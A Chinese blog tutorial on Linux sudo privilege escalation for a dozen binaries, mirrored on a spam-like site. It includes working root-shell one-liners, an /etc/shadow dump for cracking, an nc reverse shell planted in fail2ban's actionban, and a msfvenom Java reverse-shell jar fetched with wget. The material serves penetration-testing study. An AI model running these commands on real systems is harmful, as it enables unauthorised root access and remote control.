当前位置: 首页 > news >正文

网站模板设计工具佛山网络推广培训

网站模板设计工具,佛山网络推广培训,苏州seo关键词优化外包,旅游网站的导航怎么做目录 写在开头 sudo expect sudo fail2ban sudo find sudo flock sudo ftp sudo gcc sudo gdb sudo git sudo gzip/gunzip sudo iftop sudo hping3 sudo java 总结与思考 写在开头 本文在上一篇博客的基础上继续讲解渗透测试的sudo提权方法。相关内容的介绍与背…目录 写在开头 sudo expect sudo fail2ban sudo find sudo flock sudo ftp sudo gcc sudo gdb sudo git sudo gzip/gunzip sudo iftop sudo hping3 sudo java 总结与思考 写在开头 本文在上一篇博客的基础上继续讲解渗透测试的sudo提权方法。相关内容的介绍与背景详见 渗透测试Linux提权精讲一之sudo方法第一期_Bossfrank的博客-CSDN博客 本文将在红队笔记大佬讲解与GTFOBins开源项目详见GTFOBins的基础上继续对Linux系统靶机的sudo提权方式进行简要总结。这里还是首先给出红队笔记大佬的视频链接 「红队笔记」Linux提权精讲Sudo风暴 - Sudo风暴第1部分扫地僧级别心法研究提权技术的同时打磨你对linux内核的深度理解。渗透测试宝典。_哔哩哔哩_bilibili 文末的总结与思考模块会对本篇涉及到的提权方法进行分类并总结sudo提权的思路与逻辑未必描述的完全恰当仅是我的个人理解也欢迎读者评论与私信共同探讨。 sudo expect 漏洞利用前提  当前用户可以以sudo高级权限运行expect指令即运行sudo -l后会有如下的行 (root) NOPASSWD: /usr/bin/expect 详情可见expect | GTFOBins expect命令可以模拟用户的输入将需要用户交互的操作自动化完成可用于脚本和其他自动化环境之中。 操作方式  sudo expect -c spawn /bin/bash;interact 其参数-c可之间添加脚本代码而不是从文件中读取代码。spawn /bin/bash用于生成bash环境用;interact指定是交互的shell运行即可提权。从expect的利用也可以看出很多可执行文件的sudo提权方式都是依靠其能够以高权限的身份指定配置文件或运行系统命令。 sudo fail2ban 漏洞利用前提  当前用户可以以sudo高级权限运行expect指令即运行sudo -l后会有如下的行 (root) NOPASSWD: /etc/init.d/fail2ban fail2ban是一个用于防御的工具可以用于针对暴力破解密码的攻击。比如当ssh登录时多次密码错误就会触发fail2ban的操作短暂封禁登录的ip短时期内无法再进行密码尝试。 操作方式  首先我们要知道fail2ban工具的目录在哪里可以用find进行查找 find -name fail2ban* -type d 2/dev/null 结果显示有好几个目录大概可以判断fail2ban的目录是/etc/fail2ban我们查看其目录下的配置文件是否可写 find /etc/fail2ban -writable -type d 2/dev/null结果显示为/etc/fail2ban/action.d也就是说配置文件action.d是可写的该目录详细规定了当触发ban时执行的操作。在linux的目录结构中若以.d为名称结尾通常说明该目录是一些脚本文件。我们进入/etc/fail2ban/action.d后发现其中有配置文件iptables-multport.conf该文件规定了当ssh登录在短时间内多次错误尝试触发ban行为后执行的操作查看这个文件的属性ls -liah iptables-multport.conf如下 345817  -rw-r--r--  1  root  root  1.5k  May  22  15:24  iptables-multport.conf 可发现所属主和所属组都是root文件的权限属性为644而我们目前仅仅是一个普通的shell用户 无法直接对该文件进行编辑修改。但是由于iptables-multport.conf所在目录/etc/fail2ban/action.d是可写的我们可以在当前目录创建和删除文件通过如下的操作实现对iptables-multport.conf的可写。首先通过mv将iptables-multport.conf文件重命名为iptables-multport.conf.bak mv iptables-multport.conf iptables-multport.conf.bak 执行此操作后/etc/fail2ban/action.d目录下就没有iptables-multport.conf文件了而有一个备份文件iptables-multport.conf.bak这个iptables-multport.conf.bak文件与先前的iptables-multport.conf文件具有相同的文件属性mv操作并不会创建新文件仅仅是修改原文件的位置或名字文件的权限并不会改变所属主和所属组均为root我们再把这个iptables-multport.conf.bak文件进行复制并命名为iptables-multport.conf mv iptables-multport.conf.bak iptables-multport.conf 这样目录中就又有iptables-multport.conf了此时由于cp操作的特性以当前用户的权限创建新文件我们查看iptables-multport.conf这个文件的属性ls -liah iptables-multport.conf可以发现所属主和所属组都变为了当前用户jackie 345123  -rw-r--r--  1  jackie  jackie  1.5k  May  22  15:54  iptables-multport.conf 此时我们就能够编辑iptables-multport.conf了vim查看并编辑在其中发现触发ban后执行的操作是actionban 操作。我们讲这个操作修改为提权的逻辑比如反弹shell即修改后的iptables-multport.conf了文件中actionban所在行内容如下 actionban rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 21 | nc kali的ip 1234 /tmp/f 修改完成后:wq报错推出再次sudo重启fail2ban服务保证我们修改的iptables-multport.conf生效 sudo /etc/init.d/fail2ban restart 然后进行kali中nc监听刚刚反弹shell的端口1234 nc -lvnp 1234 最后我们只要再次ssh尝试登录jackie这个账户并故意短时间内快速多次用错误密码尝试具体需要多快可以查看文件/etc/fail2ban/jail.conf里面写了10s内尝试5次就会触发ban。但我们只要尽可能的快速多次输入错误密码即可触发actionban操作即可触发反弹shell。 利用fail2ban的操作看似复杂其实核心就是我们修改了fail2ban触发ban后执行的逻辑改为了反弹shell然后故意错误密码短时间多次尝试触发ban利用fail2ban的sudo权限触发ban后执行了我们指定的反弹shell操作。利用的难点在于 1.必须知道fail2ban是干啥的其中的配置文件在哪里触发ban后的action的操作命令在哪里。 2.Linux系统的权限逻辑配置文件iptables-multport.conf本身是不可编辑的权限为644当前用户无法编辑但iptables-multport.conf所在目录action.d是可写的我们利用mv和cp命令的权限逻辑最终使得当前用户jackie对iptables-multport.conf具有可写权限。 sudo find 漏洞利用前提  当前用户可以以sudo高级权限运行find指令即运行sudo -l后会有如下的行 (root) NOPASSWD: /usr/bin/find 详情可见find | GTFOBins 操作方式  sudo find . -exec /bin/bash \; -quit 运行上述命令即可提权。用find命令随便在某个目录查找比如当前目录.然后添加参数-exec执行bash/bin/bash不会对find找到的文件进行任何处理其中的分号;表示-exec执行命令的结束位置分号;前面的\是转义符对分号;进行了转义如果不加转义符/则分号;会被解释为命令行的语句分割符会使得-exec找不到命令执行的结束位置。 sudo flock 漏洞利用前提  当前用户可以以sudo高级权限运行flock指令即运行sudo -l后会有如下的行 (root) NOPASSWD: /usr/bin/flock flock本身是一个linux系统中管理文件锁定的实用程序协调多个进程对文件系统的访问避免多个进程同时访问一个资源导致问题。利用详情可见flock | GTFOBins 操作方式  sudo flock -u / /bin/bash 运行即可提权。-u参数表示解锁unlock此处为解锁根目录/的文件并用/bin/bash来操作该指令会启动/bin/bash会话从而实现提权。 sudo ftp 漏洞利用前提  当前用户可以以sudo高级权限运行ftp指令即运行sudo -l后会有如下的行 (root) NOPASSWD: /usr/bin/ftp 利用详情可见flock | GTFOBins 操作方式  sudo ftp !/bin/sh 运行即可提权逻辑显然利用ftp的交互命令行启动系统的bash。 sudo gcc 漏洞利用前提  当前用户可以以sudo高级权限运行gcc编译指令即运行sudo -l后会有如下的行 (root) NOPASSWD: /usr/bin/gcc 利用详情可见gcc | GTFOBins 操作方式  sudo gcc -wrapper /bin/bash,-s . 运行即可提权。用-wrapper指定包装器在包装器中添加启动shell的指令,-s是bash的参数指定从标准输入读取命令保证读取到EOF时不会退出点.表示编译的内容此时我们并不关心编译啥随便给个当前目录.即可。 sudo gdb gdb | GTFOBins漏洞利用前提  当前用户可以以sudo高级权限运行gdb编译指令即运行sudo -l后会有如下的行 (root) NOPASSWD: /usr/bin/gdb gdb是GNU debugger的缩写是源代码级别的调试器主要用于C/C的程序调试。利用详情可见gdb | GTFOBins 操作方式 sudo gdb -nx -ex !bash -ex quit 运行即可提权其中-nx表示启动时不读取执行任何配置文件-ex表示执行指令感叹号!表示执行的是系统命令执行完之后再执行退出-ex quit。  sudo git 漏洞利用前提  当前用户可以以sudo高级权限运行git指令即运行sudo -l后会有如下的行 (root) NOPASSWD: /usr/bin/git 利用详情可见git | GTFOBins 操作方式 sudo git branch --help !/bin/bash 通过查看帮助时调用了类似less的机制实现了提权在查看帮助时可以输入感叹号!执行系统命令。该方法与在less中提权是很相似的。 sudo gzip/gunzip 漏洞利用前提  当前用户可以以sudo高级权限运行压缩/解压缩gzip/gunzip指令即运行sudo -l后会有如下的行 (root) NOPASSWD: /usr/bin/gzip (root) NOPASSWD: /usr/bin/gunzip 利用详情可见gzip | GTFOBins 操作方式 sudo gzip -f /etc/shadow -t 运行后会暴露/etc/shadow文件的内容然后再用john破解即可我的上一篇博客有类似的利用比如sudo apache2详见渗透测试Linux提权精讲一之sudo方法第一期_Bossfrank的博客-CSDN博客 其中-t表示检查压缩文件在进行检查的时候就会读取并显示对应文件从而暴露了敏感文件/etc/shadow -f表示force强制执行保证程序可以正常执行。gunzip的利用方式完全一致。 sudo iftop 漏洞利用前提  当前用户可以以sudo高级权限运行iftop指令即运行sudo -l后会有如下的行 (root) NOPASSWD: /usr/sbin/iftop iftop是一个命令行形式的网络流量监控工具用于实时显示某个网络接口的带宽使用情况可以显示实时视图。利用详情可见iftop | GTFOBins 操作方式 sudo iftop /bin/bash 通过输入!告诉工具要执行系统命令然后启动bash提权。 sudo hping3 漏洞利用前提  当前用户可以以sudo高级权限运行网络工具hping3指令即运行sudo -l后会有如下的行 (root) NOPASSWD: /usr/sbin/hping3 hping3是一个非常强大的网络工具主要用于分析测试网络环境生成各种类型的数据包。利用详情可见hping3 | GTFOBins 操作方式 sudo hping3 /bin/bash 利用方式和sudo ftp类似工具都有自带的命令行在自带的命令行中运行系统命令启动bash即可提权。  sudo java 漏洞利用前提  当前用户可以以sudo高级权限运行java即运行sudo -l后会有如下的行 (root) NOPASSWD: /usr/bin/java 遇到这种运行主流语言作为sudo的指令时首先考虑采用该语言本身的反弹shell指令提权。  操作方式 思路就是写一个java的反弹shellshell.jar然后再靶机中执行java -jar shell.jar即可我们此处用kali自带的msfvenom生成java的反弹shell msfvenom -p java/shell_reverse_tcp LHOSTkali的ip LPORT1234 -f jar -o shell.jar 然后把这个文件传到靶机上传统思路当前目录开启http服务 php -S 0:80 然后在靶机中把这个shell.jar给他wget下来 wget http://kali的ip/shell.jar 然后靶机中运行即可注意kali中先要开启nc -lvnp 1234 java -jar shell.jar 总结与思考 本文介绍了12种常见的sudo提权方式主要还是利用了系统对可执行文件/工具的高权限配置使得低权限的用户初始靶机shell能够以root权限sudo免密执行高权限的指令。相信通过本文的介绍希望读者能够对提权的本质低权限用户因为某种原因配置/漏洞能够运行高权限的指令/工具/脚本有更为直观的理解。最后决定还是将本文的12种提权方式强行来一个归类总结纯属个人理解如果有总结不到位的地方还请读者多多指出。 可直接执行系统命令sudo expect, sudo find, sudo gdb 利用工具运行时触发的脚本sudo fail2ban 利用工具的某些可以启动shell的参数sudo flock, sudo gcc 交互命令行可执行系统命令sudo ftp, sudo itop, sudo hping3 敏感文件泄露sudo gzip/gunzip 类似在less环境执行系统命令sudo git 某种语言编写反弹shellsudo java 这篇博客到这里就结束了总结真的不易还请读者多多点赞关注支持 本文所提到的提权方式我暂未全部实践过可能还需要长期的渗透测试打靶与实践才能遇到这么多种情况吧。近期我将继续总结有关Linux提权相关的方法、也会继续坚持打靶还望读者多多支持。
http://www.w-s-a.com/news/220651/

相关文章:

  • 太阳镜商城网站建设公司做网站
  • 如何制作个人作品网站宣传片拍摄合同
  • 关于微网站策划ppt怎么做做插画的网站
  • 做设计网上揽活哪个网站最好中企动力算大厂吗
  • 电子商务网站开发常用工具牡丹江吧
  • 四川成都网站制作公司wordpress 获取某个分类的文章
  • wordpress 编辑器推动门户网站建设不断优化升级
  • 做游戏网站的前景温江区建设局网站
  • 济南做微网站推广做网站seo优化总结
  • 巢湖网站建设电话长沙大型互联网公司
  • wordpress站群主机海南人
  • 云南网站建设维护商业网站建设教程
  • 云南省滇中引水工程建设管理局网站jsp个人网站设计
  • 网站建设 域名业务 邮箱互联网装饰网站
  • 建设厅技工在哪个网站上查询有了网站模板 还要怎样做
  • 城市联盟网站怎么做百度云网站建设视频教程
  • 织梦cms 官方网站网页视频如何下载到电脑
  • 查询建设公司业绩网站国外外链平台
  • 搭建直播网站需要怎么做做石材网站步骤
  • 移动网站如何做权重wordpress 统计字数 插件
  • 编写网站的软件百度指数教程
  • 网站改版建议策划书做设计什么兼职网站
  • 北京做兼职网站文创产品设计流程
  • 南阳做玉器网站wordpress 图片被缩小
  • 自己做网站卖衣服cms做网站容易不
  • 安徽安搜做的网站怎么样手机网站商城建设答辩问题
  • 分析不同网站的优缺点房产网站定制
  • 深圳工业设计大展2021论坛与网站做优化哪个更好
  • 什么网站做招聘比较好网络营销渠道管理
  • 网站建设选择什么模式淘宝网站可以做轮播吗